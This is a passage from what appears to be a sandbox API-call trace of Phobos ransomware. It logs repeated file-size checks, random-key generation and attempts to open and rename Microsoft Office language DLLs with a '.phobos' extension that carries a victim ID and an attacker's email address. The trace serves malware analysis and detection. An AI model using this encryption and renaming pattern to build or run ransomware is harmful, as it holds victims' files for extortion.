"c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0122.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll")) returned 0 [0122.566] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.566] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.566] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=45920) returned 1 [0122.566] CloseHandle (hObject=0x33c) returned 1 [0122.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll")) returned 0x2020 [0122.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.566] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.567] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.567] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.567] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=31584) returned 1 [0122.567] CloseHandle (hObject=0x33c) returned 1 [0122.567] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll")) returned 0x2020 [0122.567] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.567] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.567] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.567] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.568] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=252256) returned 1 [0122.568] CloseHandle (hObject=0x33c) returned 1 [0122.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll")) returned 0x2020 [0122.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.568] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.568] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.568] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.568] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=219488) returned 1 [0122.569] CloseHandle (hObject=0x33c) returned 1 [0122.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll")) returned 0x2020 [0122.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.569] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.569] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.569] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.569] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=652640) returned 1 [0122.569] CloseHandle (hObject=0x33c) returned 1 [0122.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll")) returned 0x2020 [0122.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.570] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.570] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.570] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.570] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=11616) returned 1 [0122.570] CloseHandle (hObject=0x33c) returned 1 [0122.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll")) returned 0x2020 [0122.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.570] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.571] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.571] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.571] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=53600) returned 1 [0122.571] CloseHandle (hObject=0x33c) returned 1 [0122.571] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll")) returned 0x2020 [0122.571] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.571] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.571] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.572] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.572] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=275808) returned 1 [0122.572] CloseHandle (hObject=0x33c) returned 1 [0122.572] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll")) returned 0x2020 [0122.572] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.572] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.572] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.573] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.573] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=107872) returned 1 [0122.573] CloseHandle (hObject=0x33c) returned 1 [0122.573] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll")) returned 0x2020 [0122.573] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.573] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.573] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.573] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.574] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=556896) returned 1 [0122.574] CloseHandle (hObject=0x33c) returned 1 [0122.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll")) returned 0x2020 [0122.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.574] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.574] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.574] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.574] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=360288) returned 1 [0122.574] CloseHandle (hObject=0x33c) returned 1 [0122.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll")) returned 0x2020 [0122.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.575] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.575] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.575] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.575] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=13152) returned 1 [0122.575] CloseHandle (hObject=0x33c) returned 1 [0122.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll")) returned 0x2020 [0122.575] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.575] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.575] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.576] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.576] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=17248) returned 1 [0122.576] CloseHandle (hObject=0x33c) returned 1 [0122.576] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll")) returned 0x2020 [0122.576] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.576] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.576] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.576] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.576] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=26976) returned 1 [0122.576] CloseHandle (hObject=0x33c) returned 1 [0122.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll")) returned 0x2020 [0122.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.577] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.577] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.577] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.577] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=473440) returned 1 [0122.577] CloseHandle (hObject=0x33c) returned 1 [0122.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll")) returned 0x2020 [0122.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.577] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.578] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.578] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, 